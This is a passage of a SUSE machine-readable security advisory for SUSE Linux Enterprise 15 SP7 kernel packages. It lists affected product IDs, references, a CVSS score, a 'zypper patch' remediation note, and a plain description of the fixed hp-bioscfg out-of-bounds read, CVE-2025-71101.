"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71100",
"url": "https://www.suse.com/security/cve/CVE-2025-71100"
},
{
"category": "external",
"summary": "SUSE Bug 1256593 for CVE-2025-71100",
"url": "https://bugzilla.suse.com/1256593"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71100"
},
{
"cve": "CVE-2025-71101",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71101"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86: hp-bioscfg: Fix out-of-bounds array access in ACPI package parsing\n\nThe hp_populate_*_elements_from_package() functions in the hp-bioscfg\ndriver contain out-of-bounds array access vulnerabilities.\n\nThese functions parse ACPI packages into internal data structures using\na for loop with index variable \u0027elem\u0027 that iterates through\nenum_obj/integer_obj/order_obj/password_obj/string_obj arrays.\n\nWhen processing multi-element fields like PREREQUISITES and\nENUM_POSSIBLE_VALUES, these functions read multiple consecutive array\nelements using expressions like \u0027enum_obj[elem + reqs]\u0027 and\n\u0027enum_obj[elem + pos_values]\u0027 within nested loops.\n\nThe bug is that the bounds check only validated elem, but did not consider\nthe additional offset when accessing elem + reqs or elem + pos_values.\n\nThe fix changes the bounds check to validate the actual accessed index.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71101",
"url": "https://www.suse.com/security/cve/CVE-2025-71101"
},
{
"category": "external",
"summary": "SUSE Bug 1256594 for CVE-2025-71101",
"url": "https://bugzilla.suse.com/1256594"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
